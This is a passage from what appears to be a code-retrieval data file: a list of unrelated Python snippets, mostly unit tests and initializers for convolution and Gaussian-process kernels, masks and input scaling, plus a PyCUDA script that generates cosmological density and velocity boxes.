= 1\n\n model, _ = _get_model(\n (1, 4, 4, 4),\n 1,\n 1,\n 0,\n input_sc,\n 0,\n kernel_sc,\n 0,\n output_sc,\n \"none\",\n (1, 1),\n (1, 1),\n 1,\n \"uint8\",\n 8,\n \"HWIO\",\n )\n model = tei.make_ethosn_composite(model, \"ethos-n.qnn_conv2d\")\n mod = tei.make_ethosn_partition(model)\n\n expected_err_msg = (\n \"Overall scale (of the input * weights / output) should be in the range (2^-32, 65536)\"\n )\n tei.test_error(mod, {}, expected_err_msg)", "def __init__(self, kernel_size):\r\n super().__init__()\r\n self.kernel_size = kernel_size", "def __init__(self, kernel_size):\r\n super().__init__()\r\n self.kernel_size = kernel_size", "def init():\n\tN = np.int32(DIM) #prepare for stitching\n\t#HII_DIM = np.int32(HII_DIM)\n\tf_pixel_factor = DIM/HII_DIM;\n\tscale = np.float32(BOX_LEN)/DIM\n\tHII_scale = np.float32(BOX_LEN)/HII_DIM\n\tshape = (N,N,N)\n\t\n\tMRGgen = MRG32k3aRandomNumberGenerator(seed_getter=seed_getter_uniform, 
offset=0)\n\n\tkernel_source = open(cmd_folder+\"/initialize.cu\").read()\n\tkernel_code = kernel_source % {\n\n\t\t'DELTAK': DELTA_K,\n\t\t'VOLUME': VOLUME,\n\t\t'DIM': DIM\n\t}\n\tmain_module = nvcc.SourceModule(kernel_code)\n\tinit_kernel = main_module.get_function(\"init_kernel\")\n\tHII_filter = main_module.get_function(\"HII_filter\")\n\tadj_complex_conj = main_module.get_function(\"adj_complex_conj\")\n\tsubsample_kernel = main_module.get_function(\"subsample\")\n\tvelocity_kernel = main_module.get_function(\"set_velocity\")\n\tpspec_texture = main_module.get_texref(\"pspec\")\n\n\tinterpPspec, interpSize = init_pspec() #interpPspec contains both k array and P array\n\tinterp_cu = cuda.matrix_to_array(interpPspec, order='F')\n\tcuda.bind_array_to_texref(interp_cu, pspec_texture)\n\n\tlargebox_d = gpuarray.zeros(shape, dtype=np.float32)\n\tinit_kernel(largebox_d, np.int32(DIM), block=block_size, grid=grid_size)\n\n\t#import IPython; IPython.embed()\n\tlargebox_d_imag = gpuarray.zeros(shape, dtype=np.float32)\n\tinit_kernel(largebox_d_imag, np.int32(DIM), block=block_size, grid=grid_size)\n\n\tlargebox_d *= MRGgen.gen_normal(shape, dtype=np.float32)\n\tlargebox_d_imag *= MRGgen.gen_normal(shape, dtype=np.float32)\n\tlargebox_d = largebox_d + np.complex64(1.j) * largebox_d_imag\n\n\t#adj_complex_conj(largebox_d, DIM, block=block_size, grid=grid_size)\n\tlargebox = largebox_d.get()\n\t#np.save(parent_folder+\"/Boxes/deltak_z0.00_{0:d}_{1:.0f}Mpc\".format(DIM, BOX_LEN), largebox)\n\n\t#save real space box before smoothing\n\tplan = Plan(shape, dtype=np.complex64)\n\tplan.execute(largebox_d, inverse=True) #FFT to real space of smoothed box\n\tlargebox_d /= scale**3\n\tnp.save(parent_folder+\"/Boxes/deltax_z0.00_{0:d}_{1:.0f}Mpc\".format(DIM, BOX_LEN), largebox_d.real.get_async())\n\n\t#save real space box after smoothing and subsampling\n\t# host largebox is still in k space, no need to reload from disk\n\tlargebox_d = gpuarray.to_gpu(largebox)\n\tsmoothR = np.float32(L_FACTOR*BOX_LEN/HII_DIM)\n\tHII_filter(largebox_d, N, ZERO, smoothR, block=block_size, grid=grid_size);\n\tplan.execute(largebox_d, inverse=True) #FFT to real space of smoothed box\n\tlargebox_d /= scale**3\n\tsmallbox_d = gpuarray.zeros(HII_shape, dtype=np.float32)\n\tsubsample_kernel(largebox_d.real, smallbox_d, N, HII_DIM, PIXEL_FACTOR, block=block_size, grid=HII_grid_size) #subsample in real space\n\tnp.save(parent_folder+\"/Boxes/smoothed_deltax_z0.00_{0:d}_{1:.0f}Mpc\".format(HII_DIM, BOX_LEN), smallbox_d.get_async())\n\n\t# reload the k-space box for velocity boxes\n\tlargebox_d = gpuarray.to_gpu(largebox)\n\t\n\t#largebox_d /= VOLUME #divide by VOLUME if using fft (vs ifft)\n\tsmoothR = np.float32(L_FACTOR*BOX_LEN/HII_DIM)\n\tlargevbox_d = gpuarray.zeros((DIM,DIM,DIM), dtype=np.complex64)\n\tsmallbox_d = gpuarray.zeros(HII_shape, dtype=np.float32)\n\tfor num, mode in enumerate(['x', 'y', 'z']):\n\t\tvelocity_kernel(largebox_d, largevbox_d, DIM, np.int32(num), block=block_size, grid=grid_size)\n\t\tHII_filter(largevbox_d, DIM, ZERO, smoothR, block=block_size, grid=grid_size)\n\t\tplan.execute(largevbox_d, inverse=True)\n\t\tlargevbox_d /= scale**3\n\t\t#import IPython; IPython.embed()\n\t\tsubsample_kernel(largevbox_d.real, smallbox_d, DIM, HII_DIM,PIXEL_FACTOR, block=block_size, grid=HII_grid_size)\n\t\tnp.save(parent_folder+\"/Boxes/v{0}overddot_{1:d}_{2:.0f}Mpc\".format(mode, HII_DIM, BOX_LEN), smallbox_d.get())\n\n\treturn", "def test_first_level_with_no_signal_scaling():\n shapes, rk = [(3, 1, 1, 2)], 1\n 
fmri_data = list()\n design_matrices = list()\n design_matrices.append(pd.DataFrame(np.ones((shapes[0][-1], rk)),\n columns=list(\n 'abcdefghijklmnopqrstuvwxyz')[:rk])\n )\n # Check error with invalid signal_scaling values\n with pytest.raises(ValueError,\n match=\"signal_scaling must be\"):\n FirstLevelModel(mask_img=False, noise_model='ols',\n signal_scaling=\"foo\")\n\n first_level = FirstLevelModel(mask_img=False, noise_model='ols',\n signal_scaling=False)\n fmri_data.append(Nifti1Image(np.zeros((1, 1, 1, 2)) + 6, np.eye(4)))\n\n first_level.fit(fmri_data, design_matrices=design_matrices)\n # trivial test of signal_scaling value\n assert first_level.signal_scaling is False\n # assert that our design matrix has one constant\n assert first_level.design_matrices_[0].equals(\n pd.DataFrame([1.0, 1.0], columns=['a']))\n # assert that we only have one theta as there is only on voxel in our image\n assert first_level.results_[0][0].theta.shape == (1, 1)\n # assert that the theta is equal to the one voxel value\n assert_almost_equal(first_level.results_[0][0].theta[0, 0], 6.0, 2)", "def test_kernel_matrix(kernel, sample):\n sample = [ele for ele in sample] # consumed several times\n\n potato = KernelMethod(kernel)\n mat = potato.matrix(sample)\n assert np.all(np.linalg.eigvals(mat) > 0) or np.isclose(\n [np.min(np.linalg.eigvals(mat))], [0]\n )", "def testMaskErrorIncompatibleRank2(self):\n\n np_mask = np.ones((3, 3))\n x = tf.constant(0.0, shape=(2, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv1D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def kernel_test(slabs, data, backend):\n Q = data[:, 0]\n\n layers = []\n for thickness, rsld, isld, sigma in slabs:\n layers.append(\n model.Layer(\n b=(rsld - 1j * isld), dens=0.1, d=thickness, sigma=sigma\n )\n )\n layers.reverse()\n stack = model.Stack(Layers=list(layers[1:-1]), Repetitions=1)\n sample = model.Sample(\n Stacks=[stack], Ambient=layers[-1], Substrate=layers[0]\n )\n # print(sample)\n\n inst = model.Instrument(\n probe=backend,\n wavelength=1.54,\n coords=\"q\",\n I0=1,\n res=0,\n restype=\"no conv\",\n respoints=5,\n resintrange=2,\n beamw=0.1,\n footype=\"no corr\",\n samplelen=10,\n pol=\"uu\",\n )\n if data.shape[1] == 4:\n dQ = data[:, 3]\n inst.restype = \"full conv and varying res.\"\n inst.res = dQ\n if backend == \"neutron pol spin flip\":\n # memory issues in matrix formalism if too many data points\n inst.respoints = 101\n else:\n inst.respoints = (\n 10001 # try to use same convolution as ref1d when generating\n )\n inst.resintrange = 3.5\n\n # print(inst)\n R = sample.SimSpecular(Q, inst)\n\n assert R.shape == data[:, 1].shape\n if data.shape[1] == 4:\n # validation accuracy is reduced for resolution runs, as strongly\n # depends on numerical convolution scheme\n if backend == \"neutron pol spin flip\":\n np.testing.assert_allclose(R, data[:, 1], rtol=0.005)\n else:\n np.testing.assert_allclose(R, data[:, 1], rtol=0.001)\n else:\n np.testing.assert_allclose(R, data[:, 1], rtol=0.001)", "def test_MKDADensity_kernel_instance_with_kwargs(testdata_cbma):\n kern = MKDAKernel(r=2)\n meta = MKDADensity(kern, kernel__r=6, null_method=\"montecarlo\", n_iters=10)\n\n assert meta.kernel_transformer.get_params().get(\"r\") == 2", "def __init__(self, columns): #, length_scale, length_scale_bounds=()):\n# assert 
isinstance(column, (list, tuple, int)), \"must be int or list of ints\"\n# self.column = [column] if isinstance(column, int) else column\n# assert all(isinstance(i, int) for i in self.column), \"must be integers\"\n self.columns = columns \n\n kernels = [Projection([c]) for c in columns]\n #factor_name(c)) for c in columns]\n \n # collect all the kernels to be combined into a single product kernel\n super(SimpleFactorKernel, self).__init__(kernels)", "def init_stitch(N):\n\tif N is None:\n\t\tN = np.int32(HII_DIM) #prepare for stitching\n\tMETA_GRID_SIZE = DIM/N\n\tM = np.int32(HII_DIM/META_GRID_SIZE)\n\t#HII_DIM = np.int32(HII_DIM)\n\tf_pixel_factor = DIM/HII_DIM;\n\tscale = np.float32(BOX_LEN/DIM)\n\tprint 'scale', scale\n\tHII_scale = np.float32(BOX_LEN/HII_DIM)\n\tshape = (DIM,DIM,N)\n\tstitch_grid_size = (DIM/(block_size[0]),\n\t\t\t\t\t\tDIM/(block_size[0]),\n\t\t\t\t\t\tN/(block_size[0]))\n\tHII_stitch_grid_size = (HII_DIM/(block_size[0]),\n\t\t\t\t\t\tHII_DIM/(block_size[0]),\n\t\t\t\t\t\tM/(block_size[0]))\n\t#ratio of large box to small size\n\tkernel_source = open(cmd_folder+\"/initialize_stitch.cu\").read()\n\tkernel_code = kernel_source % {\n\n\t\t'DELTAK': DELTA_K,\n\t\t'DIM': DIM, \n\t\t'VOLUME': VOLUME,\n\t\t'META_BLOCKDIM': N\n\t}\n\tmain_module = nvcc.SourceModule(kernel_code)\n\tinit_stitch = main_module.get_function(\"init_kernel\")\n\tHII_filter = main_module.get_function(\"HII_filter\")\n\tsubsample_kernel = main_module.get_function(\"subsample\")\n\tvelocity_kernel = main_module.get_function(\"set_velocity\")\n\tpspec_texture = main_module.get_texref(\"pspec\")\n\tMRGgen = MRG32k3aRandomNumberGenerator(seed_getter=seed_getter_uniform, offset=0)\n\tplan2d = Plan((np.int64(DIM), np.int64(DIM)), dtype=np.complex64)\n\tplan1d = Plan((np.int64(DIM)), dtype=np.complex64)\n\tprint \"init pspec\"\n\tinterpPspec, interpSize = init_pspec() #interpPspec contains both k array and P array\n\tinterp_cu = cuda.matrix_to_array(interpPspec, order='F')\n\tcuda.bind_array_to_texref(interp_cu, pspec_texture)\n\t#hbox_large = pyfftw.empty_aligned((DIM, DIM, DIM), dtype='complex64')\n\thbox_large = np.zeros((DIM, DIM, DIM), dtype=np.complex64)\n\t#hbox_small = np.zeros(HII_shape, dtype=np.float32)\n\t#hbox_large = n\n\tsmoothR = np.float32(L_FACTOR*BOX_LEN/HII_DIM)\n\n\t# Set up pinned memory for transfer\n\t#largebox_hs = cuda.aligned_empty(shape=shape, dtype=np.float32, alignment=resource.getpagesize())\n\tlargebox_pin = cuda.pagelocked_empty(shape=shape, dtype=np.float32)\n\tlargecbox_pin = cuda.pagelocked_empty(shape=shape, dtype=np.complex64)\n\n\tlargebox_d = gpuarray.zeros(shape, dtype=np.float32)\n\tlargebox_d_imag = gpuarray.zeros(shape, dtype=np.float32)\n\tprint \"init boxes\"\n\tfor meta_z in xrange(META_GRID_SIZE):\n\t\t# MRGgen = MRG32k3aRandomNumberGenerator(seed_getter=seed_getter_uniform, offset=meta_x*N**3)\n\t\tinit_stitch(largebox_d, DIM, np.int32(meta_z),block=block_size, grid=stitch_grid_size)\n\t\tinit_stitch(largebox_d_imag, DIM, np.int32(meta_z),block=block_size, grid=stitch_grid_size)\n\t\tlargebox_d *= MRGgen.gen_normal(shape, dtype=np.float32)\n\t\tlargebox_d_imag *= MRGgen.gen_normal(shape, dtype=np.float32)\n\t\tlargebox_d = largebox_d + np.complex64(1.j) * largebox_d_imag\n\t\tcuda.memcpy_dtoh_async(largecbox_pin, largebox_d)\n\t\thbox_large[:, :, meta_z*N:(meta_z+1)*N] = largecbox_pin.copy()\n\t#if want to get velocity need to use this\n\tif True:\n\t\tprint \"saving kbox\"\n\t\tnp.save(parent_folder+\"/Boxes/deltak_z0.00_{0:d}_{1:.0f}Mpc.npy\".format(DIM, 
BOX_LEN), hbox_large)\n\n\tprint \"Executing FFT on device\"\n\t#hbox_large = pyfftw.interfaces.numpy_fft.ifftn(hbox_large).real\n\thbox_large = fft_stitch(N, plan2d, plan1d, hbox_large, largebox_d).real\n\tprint hbox_large.dtype\n\tprint \"Finished FFT on device\"\n\tnp.save(parent_folder+\"/Boxes/deltax_z0.00_{0:d}_{1:.0f}Mpc.npy\".format(DIM, BOX_LEN), hbox_large)\n\t\n\tif True:\n\t\tprint \"loading kbox\"\n\t\thbox_large = np.load(parent_folder+\"/Boxes/deltak_z0.00_{0:d}_{1:.0f}Mpc.npy\".format(DIM, BOX_LEN))\n\tfor meta_z in xrange(META_GRID_SIZE):\n\t\tlargebox_pin = hbox_large[:, :, meta_z*N:(meta_z+1)*N].copy()\n\t\t#cuda.memcpy_htod_async(largebox_d, largebox_pin)\n\t\tlargebox_d = gpuarray.to_gpu_async(hbox_large[:, :, meta_z*N:(meta_z+1)*N].copy())\n\t\tHII_filter(largebox_d, DIM, np.int32(meta_z), ZERO, smoothR, block=block_size, grid=stitch_grid_size);\n\t\thbox_large[:, :, meta_z*N:(meta_z+1)*N] = largebox_d.get_async()\n\t#import IPython; IPython.embed()\n\tprint \"Executing FFT on host\"\n\t#hbox_large = hifft(hbox_large).astype(np.complex64).real\n\t#hbox_large = pyfftw.interfaces.numpy_fft.ifftn(hbox_large).real\n\thbox_large = fft_stitch(N, plan2d, plan1d, hbox_large, largebox_d).real\n\tprint \"Finished FFT on host\"\n\t#import IPython; IPython.embed()\n\n\t# for meta_x in xrange(META_GRID_SIZE):\n\t# \tfor meta_y in xrange(META_GRID_SIZE):\n\t# \t\tfor meta_z in xrange(META_GRID_SIZE):\n\t# \t\t\tlargebox_d = gpuarray.to_gpu(hbox_large[meta_x*N:(meta_x+1)*N, meta_y*N:(meta_y+1)*N, meta_z*N:(meta_z+1)*N])\n\t# \t\t\tHII_filter(largebox_d, N, np.int32(meta_x), np.int32(meta_y), np.int32(meta_z), ZERO, smoothR, block=block_size, grid=grid_size);\n\t# \t\t\thbox_large[meta_x*N:(meta_x+1)*N, meta_y*N:(meta_y+1)*N, meta_z*N:(meta_z+1)*N] = largebox_d.get()\n\t#plan = Plan(shape, dtype=np.complex64)\n\t#plan.execute(largebox_d, inverse=True) #FFT to real space of smoothed box\n\t#largebox_d /= VOLUME #divide by VOLUME if using fft (vs ifft)\n\n\n\t# This saves a large resolution deltax\n\n\t\n\tprint \"downsampling\"\n\tsmallbox_d = gpuarray.zeros((HII_DIM,HII_DIM,M), dtype=np.float32)\n\tfor meta_z in xrange(META_GRID_SIZE):\n\t\tlargebox_pin = hbox_large[:, :, meta_z*N:(meta_z+1)*N].copy()\n\t\tcuda.memcpy_dtoh_async(largecbox_pin, largebox_d)\n\t\t#largebox_d = gpuarray.to_gpu_async(hbox_large[:, :, meta_z*N:(meta_z+1)*N].copy())\n\t\tlargebox_d /= scale**3 #\n\t\tsubsample_kernel(largebox_d, smallbox_d, DIM, HII_DIM, PIXEL_FACTOR, block=block_size, grid=HII_stitch_grid_size) #subsample in real space\n\t\thbox_small[:, :, meta_z*M:(meta_z+1)*M] = smallbox_d.get_async()\n\tnp.save(parent_folder+\"/Boxes/smoothed_deltax_z0.00_{0:d}_{1:.0f}Mpc\".format(HII_DIM, BOX_LEN), hbox_small)\n\t#import IPython; IPython.embed()\n\n\n\t# To get velocities: reload the k-space box\n\thbox_large = np.load(parent_folder+\"/Boxes/deltak_z0.00_{0:d}_{1:.0f}Mpc.npy\".format(DIM, BOX_LEN))\n\thvbox_large = np.zeros((DIM, DIM, DIM), dtype=np.float32)\n\thvbox_small = np.zeros(HII_shape, dtype=np.float32)\n\tsmoothR = np.float32(L_FACTOR*BOX_LEN/HII_DIM)\n\tlargevbox_d = gpuarray.zeros((DIM,DIM,N), dtype=np.complex64)\n\tsmallvbox_d = gpuarray.zeros((HII_DIM, HII_DIM, M), dtype=np.float32)\n\tfor num, mode in enumerate(['x', 'y', 'z']):\n\t\tfor meta_z in xrange(META_GRID_SIZE):\n\t\t\tlargebox_d = gpuarray.to_gpu_async(hbox_large[:, :, meta_z*N:(meta_z+1)*N].copy())\n\t\t\t#largebox_d /= VOLUME #divide by VOLUME if using fft (vs ifft)\n\t\t\tvelocity_kernel(largebox_d, largevbox_d, DIM, 
np.int32(meta_z), np.int32(num), block=block_size, grid=stitch_grid_size)\n\t\t\tHII_filter(largevbox_d, DIM, ZERO, smoothR, block=block_size, grid=stitch_grid_size)\n\t\t\tprint hvbox_large.shape, largevbox_d.shape\n\t\t\thvbox_large[:, :, meta_z*N:(meta_z+1)*N] = largevbox_d.get_async()\n\t\thvbox_large = fft_stitch(N, plan2d, plan1d, hvbox_large, largevbox_d).real\n\t\tfor meta_z in xrange(META_GRID_SIZE):\n\t\t\tlargevbox_d = gpuarray.to_gpu_async(hvbox_large[:, :, meta_z*N:(meta_z+1)*N].copy())\n\t\t\tsubsample_kernel(largevbox_d.real, smallvbox_d, DIM, HII_DIM,PIXEL_FACTOR, block=block_size, grid=HII_stitch_grid_size)\n\t\t\thvbox_small[:, :, meta_z*M:(meta_z+1)*M] = smallvbox_d.get_async()\n\t\tnp.save(parent_folder+\"/Boxes/v{0}overddot_{1:d}_{2:.0f}Mpc\".format(mode, HII_DIM, BOX_LEN), smallvbox_d.get())\n\n\treturn", "def test_truncate2():\n X = rand(5,5,5)\n T = hosvd(X)\n k = 3\n Tk = T.truncate(k)\n E = X - Tk.asarray()\n Cdk = T.X\n Cdk[:k,:k,:k] = 0\n assert np.allclose(fro_norm(E), fro_norm(Cdk))", "def _initialize_kernel(input_dim: int,\n kernel: str = 'RBF',\n use_single_gp: bool = False) -> GenericKernel:\n if kernel == 'RBF':\n return RBFKernel(input_dim, use_single_gp)\n elif kernel == 'Matern52':\n return Matern52Kernel(input_dim, use_single_gp)\n elif kernel == 'Matern32':\n return Matern32Kernel(input_dim, use_single_gp)\n elif kernel == 'RationalQuadratic':\n return RationalQuadraticKernel(\n input_dim=input_dim, use_single_gp=use_single_gp)\n elif kernel == 'Sigmoid':\n return SigmoidKernel(input_dim, use_single_gp)\n else:\n sys.exit(\"Error: specified Gaussian Process kernel not valid\")", "def testMaskErrorIncompatibleRank1(self):\n\n np_mask = np.ones((3,))\n x = tf.constant(0.0, shape=(2, 8, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv2D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def init_layer(layer):\n \n if layer.weight.ndimension() == 4:\n (n_out, n_in, height, width) = layer.weight.size()\n n = n_in * height * width\n \n elif layer.weight.ndimension() == 2:\n (n_out, n) = layer.weight.size()\n\n std = math.sqrt(2. 
/ n)\n scale = std * math.sqrt(3.)\n layer.weight.data.uniform_(-scale, scale)\n\n if layer.bias is not None:\n layer.bias.data.fill_(0.)", "def _WeightInit(self, stddev):\n return init_ops.truncated_normal_initializer(stddev=stddev)", "def test_MKDADensity_kernel_instance(testdata_cbma):\n kern = MKDAKernel(r=5)\n meta = MKDADensity(kern, null_method=\"montecarlo\", n_iters=10)\n results = meta.fit(testdata_cbma)\n assert isinstance(results, nimare.results.MetaResult)", "def test_null_bootstrapping(self):\n\n apply = lambda p, x, i: x[:, :1]\n output = apply(self._params, self._batch.x, self._index)\n # y is zero, hence the loss is just the mean square of the output.\n expected_loss = np.mean(np.square(output))\n\n loss_fn = single_index.L2Loss()\n loss, unused_metrics = loss_fn(\n apply=apply, params=self._params, batch=self._batch, index=self._index)\n self.assertEqual(\n loss, expected_loss,\n (f'expected loss with null bootstrapping is {expected_loss}, '\n f'but it is {loss}'))", "def testMaskErrorIncompatibleRank2(self):\n\n np_mask = np.ones((3, 3))\n x = tf.constant(0.0, shape=(2, 8, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv2D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def test_init_with_width_less_or_equal_0(self):\n with self.assertRaisesRegex(ValueError, \"width must be > 0\"):\n Square(0, 1)\n with self.assertRaisesRegex(ValueError, \"width must be > 0\"):\n Square(-1, 1)", "def check_kernel(cls):\n pass", "def __init__(self, ksize_low, ksize_high=None): \n self._sigma_low = 0.3*(ksize_low//2 - 1) + 0.8\n \n if ksize_high is None:\n self._sigma_high = np.sqrt(2)*self._sigma_low\n else:\n self._sigma_high = 0.3*(ksize_high//2 - 1) + 0.8", "def __init__(self, kernel_size, *args, **kwargs):\n super().__init__()\n self.kernel_size = kernel_size", "def __init__(self, kernel_size, *args, **kwargs):\n super().__init__()\n self.kernel_size = kernel_size", "def testMaskErrorIncompatibleRank1(self):\n\n np_mask = np.ones((3,))\n x = tf.constant(0.0, shape=(2, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv1D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def test_unroll_kern(self):\r\n # 6 filters is a multiple of 2 and 3. 
Should work.\r\n self.validate((2, 3, 3, 3), (6, 3, 2, 2), 'valid', unroll_kern=2,\r\n verify_grad=False)\r\n self.validate((2, 3, 3, 3), (6, 3, 2, 2), 'valid', unroll_kern=3,\r\n verify_grad=False)", "def test__get_kernel_size_numel_raise_value_error(kernel_size):\n with pytest.raises(ValueError):\n utils._get_kernel_size_numel(kernel_size)", "def testMask1D(self):\n mask = np.ones((3,), dtype=np.float32)\n inputs = tf.constant(1.0, shape=(1, 5, 5, 2))\n conv1 = snt.Conv2D(\n output_channels=1,\n kernel_shape=3,\n mask=mask,\n padding=snt.VALID,\n use_bias=False,\n initializers=create_constant_initializers(1.0, 0.0, use_bias=False))\n out = conv1(inputs)\n expected_out = 18 * np.ones((1, 3, 3, 1))\n with self.test_session():\n tf.variables_initializer([conv1.w]).run()\n self.assertAllClose(out.eval(), expected_out)", "def test_inputscaling(self):\n esn = ESN(N_in,N_out,input_scaling=2)\n self.assertTrue(np.all(2*self.X == esn._scale_inputs(self.X)))\n esn.fit(self.X,self.y)\n esn.predict(self.Xp)\n\n esn = ESN(N_in,N_out,input_scaling=[2]*N_in)\n self.assertTrue(np.all(2*self.X == esn._scale_inputs(self.X)))\n esn.fit(self.X,self.y)\n esn.predict(self.Xp)\n\n esn = ESN(N_in,N_out,input_scaling=np.array([2]*N_in))\n self.assertTrue(np.all(2*self.X == esn._scale_inputs(self.X)))\n esn.fit(self.X,self.y)\n esn.predict(self.Xp)\n\n with self.assertRaises(ValueError):\n esn = ESN(N_in,N_out,input_scaling=[2]*(N_in+1))\n\n with self.assertRaises(ValueError):\n esn = ESN(N_in,N_out,input_scaling=np.array([[2]*N_in]))", "def __init__(self, ksize: torch.Tensor = 7, sigma: torch.Tensor = 5):\r\n super().__init__()\r\n self.ksize = ksize\r\n self.sigma = sigma\r\n\r\n self.conv2d_guass = get_gaussian_kernel(self.ksize, self.sigma)", "def test_normalize_zero_length_vector(self):\n\n v = Vector({ 'x': 0 })\n v.normalize()\n self.assertEqual({ 'x': 0 }, v.dimensions)", "def initialize_(self, kernel, bias=None):\n dtype = self.body[0].weight.dtype\n device = self.body[0].weight.device\n kernel = torch.tensor(kernel, dtype=dtype, device=device, requires_grad=True)\n assert kernel.shape == self.body[0].weight.shape, 'Wrong kernel shape!'\n if bias is not None:\n bias = torch.tensor(bias, dtype=dtype, device=device, requires_grad=True)\n assert bias.shape == self.body[0].bias.shape, 'Wrong bias shape!'\n self.body[0].weight.data.copy_(kernel)\n self.body[0].bias.data.copy_(bias)", "def test_bootstrap_array_invalid_axis():\n test_array = np.zeros((3, 4))\n test_axis = 2\n nboot = 5\n pytest.raises(\n ValueError, utils.bootstrap_array, test_array, nboot=nboot, axis=test_axis\n )", "def test_gpu():\n vectorizer = Vectorizer(device=\"gpu\", engine=\"cuml\")\n pytest.raises(ValueError, vectorizer.fit_transform, X_text)", "def test__get_conv_raise_dimension_error(N):\n with pytest.raises(ValueError):\n utils._get_conv(N)", "def set_kernel_reg(model, lambdal1 = 0, lambdal2 = 0):\r\n\r\n\r\n\tfor layer in model.layers:\r\n\t\tif hasattr(layer, 'kernel_regularizer'):\r\n\t\t\tlayer.kernel_regularizer = l1_l2(l1 = lambdal1, l2 = lambdal2)\r\n\r\n\treturn model", "def test_MKDADensity_kernel_class(testdata_cbma):\n meta = MKDADensity(MKDAKernel, kernel__r=5, null_method=\"montecarlo\", n_iters=10)\n results = meta.fit(testdata_cbma)\n assert isinstance(results, nimare.results.MetaResult)", "def testMask2D(self):\n mask = np.ones((3, 2), dtype=np.float32)\n inputs = tf.constant(1.0, shape=(1, 5, 2))\n conv1 = snt.Conv1D(\n output_channels=1,\n kernel_shape=3,\n mask=mask,\n padding=snt.VALID,\n use_bias=False,\n 
initializers=create_constant_initializers(1.0, 0.0, use_bias=False))\n out = conv1(inputs)\n expected_out = np.reshape(np.array([6, 6, 6]), (1, 3, 1))\n with self.test_session():\n tf.variables_initializer([conv1.w]).run()\n self.assertAllClose(out.eval(), expected_out)", "def __init__(self,\n min_level,\n max_level,\n classes=80,\n boxes_per_level=3,\n output_extras=0,\n norm_momentum=0.99,\n norm_epsilon=0.001,\n kernel_initializer=\"VarianceScaling\",\n subdivisions=8,\n kernel_regularizer=None,\n bias_regularizer=None,\n activation=None,\n smart_bias=False,\n **kwargs):\n\n super().__init__(**kwargs)\n self._min_level = min_level\n self._max_level = max_level\n\n self._key_list = [\n str(key) for key in range(self._min_level, self._max_level + 1)\n ]\n\n self._classes = classes\n self._boxes_per_level = boxes_per_level\n self._output_extras = output_extras\n\n self._output_conv = (classes + output_extras + 5) * boxes_per_level\n self._smart_bias = smart_bias\n\n self._base_config = dict(\n activation=activation,\n subdivisions=subdivisions,\n norm_momentum=norm_momentum,\n norm_epsilon=norm_epsilon,\n kernel_initializer=kernel_initializer,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer)\n\n self._conv_config = dict(\n filters=self._output_conv,\n kernel_size=(1, 1),\n strides=(1, 1),\n padding=\"same\",\n use_bn=False,\n **self._base_config)", "def testInvalidNumberOfClasses(self):\n\n feature = layers.real_valued_column('feature')\n with self.assertRaises(ValueError):\n _ = kernel_estimators.KernelLinearClassifier(\n feature_columns=[feature], n_classes=1)", "def testRaisesErrorWhenNoSampleMask(self):\n t = CoalescenceTree(self.coal)\n with self.assertRaises(ValueError):\n t.set_speciation_parameters(\n speciation_rates=[0.5, 0.7], record_spatial=\"T\", record_fragments=\"T\", sample_file=\"null\"\n )", "def _initialize(shape, dtype, batch_ndims, scale, mode, distribution,\n seed=None):\n if not dtype_util.is_floating(dtype):\n raise TypeError('Argument `dtype` must be float type (saw: \"{}\").'.format(\n dtype))\n shape = prefer_static.reshape(shape, shape=[-1]) # Ensure shape is vector.\n fan_in, fan_out = _compute_fans_from_shape(shape, batch_ndims)\n fans = _summarize_fans(fan_in, fan_out, mode, dtype)\n scale = prefer_static.cast(scale, dtype)\n return _sample_distribution(shape, scale / fans, distribution, seed, dtype)", "def __init__(self, kernel_parameter: Union[int, float] = 1, nu=1.5):\n super().__init__(kernel_parameter)\n self.nu = nu", "def test_regularization_0size_interval(self):\n reg = modelgen.get_regularization(2, 2)\n assert reg == 0.01", "def test_matern12_zero_variance(matern):\n with pytest.raises(ValueError) as exp:\n matern(lengthscale=1.0, variance=0.0, output_dim=1)\n assert exp.value.args[0].find(\"variance must be positive.\") >= 0", "def __init__(self):\n kernel=numpy.array([[-1, -1, -1],\n [-1, 9, -1],\n [-1, -1, -1]])\n VConvolutionFilter.__init__(self,kernel)", "def testInputTypeError(self, use_bias):\n conv1 = snt.SeparableConv2D(\n output_channels=3,\n channel_multiplier=1,\n kernel_shape=3,\n padding=snt.SAME,\n use_bias=use_bias,\n initializers=create_separable_constant_initializers(\n 1.0, 1.0, 1.0, use_bias))\n\n for dtype in (tf.uint32, tf.float64):\n x = tf.constant(np.ones([1, 5, 5, 1]), dtype=dtype)\n err = \"Input must have dtype tf.float.*\"\n with self.assertRaisesRegexp(TypeError, err):\n conv1(x)", "def test_init_variants():\n # get data\n X, _, _, _ = get_data()\n # set seed and kernel initialisers for 
